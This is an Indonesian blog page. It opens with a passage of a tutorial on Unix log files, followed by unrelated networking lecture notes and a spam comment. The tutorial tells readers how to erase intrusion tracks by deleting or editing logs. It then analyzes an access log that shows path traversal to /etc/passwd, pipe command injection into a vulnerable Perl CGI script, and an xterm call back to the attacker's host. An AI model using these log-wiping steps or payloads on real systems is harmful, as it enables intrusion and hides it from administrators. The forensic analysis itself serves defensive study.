9. utmp: mencatat siapa saja yang sedang login ato berada dalam sebuah mesin. Biasanya menggunakan command who untuk mengetahui penyusup yang sedang asik-asikan didalam mesin. File ini berekstensi utmpx.
10. wtmp: mencatet user yang login menggunakan ftp,berekstensi wtmpx, dan menggunakan hexaeditor untuk mengeditnya.
11. vold.log: mencatat error pada mesin yang menggunakan media external,contoh cd room, floppy, dsb.
12. xferlog: mencatat penggunaan ftp (hampir sama spt wmtp).
13. syslog:

Setelah kita mengetahui sedikit tentang macam-macamnya lalu kita akan mencoba telusuri lebih dalam lagi,.semua file diatas terangkum dalam sebuah file yang dinamakan syslog. Syslog ini mempunyai daemon yang berguna sebagai ?jantungnya? dinamakan syslogd. Sewaktu syslog ini berjalan dia akan menuju file conf yang terletak pada /etc/syslog.conf yang membaca dari tiga buah report yang dikeluarkan oleh:
a. /dev/klog(membaca kernel report)
b. /dev/log(membaca report program yang berjalan pada local mesin)
c. UDP port 514(membaca report program yang berjalan pada network)
So sedikit kita sudah mengetahui tentang file log ini,..tapi?dimanakah file tersebut berada??? Untuk hal yang satu ini tempatnya abstrak alias bisa dipindah-pindah, admin yang topcer biasanya menyembunyikan file , iya gakJini dalam brangkasnya,..hehehehehhe..gak mungkin lah Bunga mungkin dalam brangkas siy, tapi memang diumpetin serapat-rapatnya . Tapi jangan sedihJserahasia hanya admin dan Tuhan yang mengetahuinya dulu, menurut pengalaman Bunga, Masih banyak admin yang teledor dengan asumsi masih diparkirkan pada tempat defaultnya,?because secure is not .Jdefault?ntu kata hacker inggris, tapi Bunga lupa Nicknya
Tempatnya file log dari pengalaman Bunga:
? /usr/adm
? /var/adm
? /var/log
Sekali lagi ini gak mutlak loh,.kalo mo jelas,datengin ajah adminnya Tanya passnya,Tanya file lognya, terus minta ijin ajah sekalian pake mesinnya,kalo yang ini halal 100%,.hehehehehehe,.becanda

Dah ketemu file lognya tapi cara membersihkannya bagaimana yach???masnya ambil kain basah lalu lap ajah monitornya, siapa tau bisa Jbersih,.hehehehehehe,.becanda lagi ding
Caranya pake perintah rm ?rf, syntak: command [patch], contoh: rm ?rf /var/log/wmtp, ato juga menggunakan text editor sepert vi / nano / pico, cukup hapus baris datanya saja, kurang lebih sama seperti konfigurai dual boot lilo

Yach, sekarang kita lanjutkan lagi, tapi dah pada capek yach,.bikin teh, kopi, or susu jangan lupa cemilannya yach, biar tambah semangat,.GO..GO..GO..

Okey sekarang kita mencoba membedah file log untuk mengetahui vulnerbilty pada mesin kita,.sebelumnya, sekali lagi maafkan Bunga jika ada kesalahan, mas, om, mba, tante, kakak, yang lebih senior dan jago Bunga minta ijin,.?satu guru satu ilmu dilarang saling menggangu?,.hehehehehehehe,?

Berikut ini contoh kasus pada http://www.c**.co.id, Bunga pernah melakukan forensic pada mesin servernya, web programernya menggunakan script CGI Perl, Servernya diobrak-abrik oleh craker gila, tapi dia agak sembrono dimana dia tidak menghapus track nya pada access_log,(untuk IP nya disamarkan):

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / HTTP/1.0? 200 3008
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / A1.jpg HTTP/1.0? 200 3456
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / V90.jpg HTTP/1.0? 200 6943
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / RG7.jpg HTTP/1.0? 200 9854

Penjelasan: Attacker dengan no Ip 10.0.*.**, dia hanya melihat-lihat web ini pada halaman utama dan kejadian ini dicatet pada jam 01:02:45.

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=contact.shtml HTTP/1.0? 200 309
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / NOW.jpg HTTP/1.0? 200 3456
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=layanan.shtml HTTP/1.0? 200 309
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / 9RG7.jpg HTTP/1.0? 200 9854

Penjelasan: Masih sulit apa maksudnya attacker dikarena dia masih melihat-lihat dan mencoba link pada web ini.

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / cgi-bin/ HTTP/1.0? 403 272

Penjelasan: Attacker mulai beraksi, dia mencoba mengakses direktory /cgi-bin/ dan hal hasil yang ditemukannya adalah 403, apa siy artinya J403??? forbiden cuy,.

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi HTTP/1.0? 200 3009
10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=index.cgi HTTP/1.0? 200 399

Penjelasan: Attacker melanjutkan serangannya lagi, sekarang dia mengikuti pola link yang telah lihatnya. Peratama ia memasukan http://www.c**.co.id/index.cgi lalu ia mencoba lagi mamasukan http://www.c**.co.id/index.cgi?page=index.cgi.
Nah dari sini si attacker dapat melihat script index.cgi nya, dari mana ia melihatnya??? .JYach dari browsernya lah,.scriptnya tampil di browser
Kenapa ini bisa terjadi???
Attacker meneliti index.cgi menerima sebuah nama file sebagai seuatu parameter dan memperlihatkan isi dari file tersebut. Disini attacker menggunakan index.cgi itu sendiri untuk menampilkan source codenya.

Source code:

01: #! /usr/bin/perl
02: # perl script to display a page back as requested by the argument
03:
04: require ?../cgi-bin/cgi-lib.pl?;
05:
06: &ReadParse(*input);
07:
08: $namafile = $input{page};
09: if ($namafile eq ??) {
10: $namafile = ?main.html?;
11: }
12:
13: print &PrintHeader;
14:
15: $namafile = ? /usr/local/apache/htdocs/? . $namafile;
16: open(FILE, $namafile);
17: while(){
18: print $_;
19: }
20: close(file);

Sekarang kita ulas dan pelajari,.bugs nya terdapat pada validasi untuk parameter-parameter yang akan dilewatkan ke script index.cgi. Filename yang dilewatkan sebagai parameter dari url ditangkap sebagai sebuah variabel $namafile pada baris 08, ditambahkan ke path absolut? usr/local/apache/htdocs? pada baris 15, dan ditampilkan pada baris 16.
JBerarti,…yups betul,.kita bisa dengan mudah mengambil file dari server web

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0? 200 786

Penjelasan: Sekarang attacker mencoba mencari password,.Wow…

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0? 200 1399

10.0.*.** – – [24/Oct/2008:01:02:45 +0530] ?GET / index.cgi?page=|xterm+ display+10.0.*.**:0.0+%26| HTTP/1.0? 200

Penjelasan: Rupanya ini attacker mengerti tentang unix dan perl, sekarang dia tidak berusaha membuka file dikarenakan dia sekarang menggunakan karakter pipa?|? diikuti dengan command-command pilihannya. Dengan demikian, perl membuka kendali filenya yang dapat menerima output standar hasil dari command-command yang dituliskan pada parameter filename. Disini attacker meminta 2 buah request:
http://www.c**.co.id/index.cgi?page=|ls … ich+xterm|
disini jelas attacker sebenernya mengeksekusi coomand ls ?la/ , id, which xterm,.apa yang didapet dari attacker mengeksekusi coomand tersebut???
Yang didapet adalah: menampilkan daftar file pada direktory root dengan perintah ls ?la/, mendapatkan id user yang efektif pada proses eksekusi index.cgi dengan perintah id, dan yang terkahir mendapatkan path xtrem biner dari perintah ?which xterm?.
Request yang kedua:
http://www.c**.co.id/index.cgi?page=|xt … *:0.0+%26|
attacker menjalankan command ?xterm ? display 10.0.*.**:0.0&?ini berarti dia menjalankan window xterm pada mesin attacker. Lalu apa yang .Jdilakukan???yach udah masukin user, trus pass, masuk deyh,.
Dari sini kita dapet mengetahui bugs pada mesin kita dengan melihat log yang ditinggalkan oleh attacker.
Yach,.segitu ajah dari bunga tentang menghapus jejak dan buka-bukaan file log tuk dapet vulnerbilty sebuah mesin.
Semoga ajah tulisan ini bermanfaat untuk kemajuan IT security Indonesia.Mohon dikoreksi lagi para senior ato orang-orang yang jago dalam bidang ini,dikarenakan Bunga masih belajar,.
Makacih buat semua orang yang ada didunia dan temen-temen semua di forum,.
Salam hangatBungaputrilanacita
http://h1.ripway.com/rumahbunga

PANJI WASMANA

160509

Agenda => tends, protokol, servis internet, security

TRENDS

  1. Pemanfaatan internet , penggunaan bandwith sangat penting, sesuai dengan aplikasi yang dibutuhkan.
  2. Semakin banyak aplikasi yang rumit di internet
  3. Drive Omni => akses informasi internet terbuka
  4. Bisnis di internet

Kemampuan kecepatan internet -> multimedia membutuhkan bandwith yang besar.

Untuk menghasilkan kulitas pelayanan yang baik -> real time

Sekuriti yang baik

Tekanan ekonomi -> membutuhkan komunikasi yang lancar, ekonomi lancar

Jaringan -> Switching, high speed transmission media, extended access media.

S -> Swtiching dedicated, tidak ada delay saat berkomuniksi, membutuhkan resources sedikit -> media komunikasi suara

HST -> kecepatan video, ECM -> memanfaatkan layer berikutnya agar data dapat terkirim baik.

Protokol ->

Bridge bermula dari protokol, merupakan mekanisme pengiriman paket

  1. Agreement
  2. Definisi kerjasama
  3. Disupport oleh 2 level (hardware, software)

Komponen jaringan

Pc -> aplikasi, OS, protokol software, links

Link -> kabel, wireless

Ethernet -> token, snet

Semuanya disembunyikan dalam simple abstraction protocol.

Lapisan protocol dan service

Core net -> end to end -> aplication

Protokol mengijikan untuk komunikasi antar aplikasi

OSI MODEL => A, P , S, T , N, D, P

Fungsi Osi -> physical, => komunikasi fisik

Pengiriman webpage

HTTP dipotong2 di paket switching, kadang gagal saat pemaketan.

Masalah dari layer model, beberapa layer tidak bebas dari…….

TCP/IP -> dimanfaatkan untuk komunikasi internet

Internet working options

Repeater -> level phisical layer -> kodean

Bridge -> level 1 & 2

Router -> level 3

Gateway -> level 5 & 6

Gateway adalah yang paling banyak dipakai….untuk menyatukan banyak aplikasi tuk bersatu

Internet Engeenerin task force -> penentuan standar kerja internet, bagaimana pengembangannya teknologi dari internet

Request of comments -> dokumen di proses dan di feedback

User Datagram Protocol -> mekanisme bersifat single port 1 to 1, ketika aplikasi memakai UDP, dipastikan tidak ada jaminan seluruh paket terpenuhi.

TCP -> Transsmission Control Protocol

Garansi disampaikan semua paket, pengiriman berurutan

Web, email, telnet

Kebutuhan bandwith fleksibel

Sangat real time

Server dan client

Server -> melayani dan terima request

Client -> mengambil manfaat dari server

Dari protokol -> socket API

FTP-> File Transfer Protocol

RFC959 -> port 21 -> separate control data connections

Virtualisasi -> memetakan port ke dalam control port supaya 1 port bisa dikoneksi oleh banyak port

Mempunya batasan tergantung OS dan hardware.

LINUX, UNIX -> cepat dalam virtualisasi

Setup -> three way handshake

HTTP 0.9/1.0

ð  Reques/ respon per TCP connection

Kerugian :

  1. Multiple connection
  2. Multiple slow start

NETSCAPE -> menggunakan koneksi ganda, membuat backup connection -> dipakai untuk mozilla

KONFIGURASI FISIK

Firewall -> memetakan paket, layer dilihat datanya berdasarkan aturan apakah sesuai dan boleh lewat atau tidak.

ENCRIPTION -> secure data

Issues in monitoring -> log

IDS -> instruction Detection system

è Mengidentifikasi aktifitas2 yang mencurigakan.

2 macam -> network IDS dan Host IDS

Deteksi dari luar dan dalam jaringan

CERT.ORG -> sekuriti

230409

Buat presentasi mengenai msat, bagaimana cara kerja, setiap rekomendasi direkam

Mendengarkan film2

130609

Virtual Private Network (VPN)

One comment

  1. If you have a problem with your PC just visit this SITE
    ,It’s a Tutorial how to clean up your PC and a new software development to:
    Prevents Computer Crashes and Speeds Up Slow PC
    And is all FREE !!It will fix your problem and saving Time



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: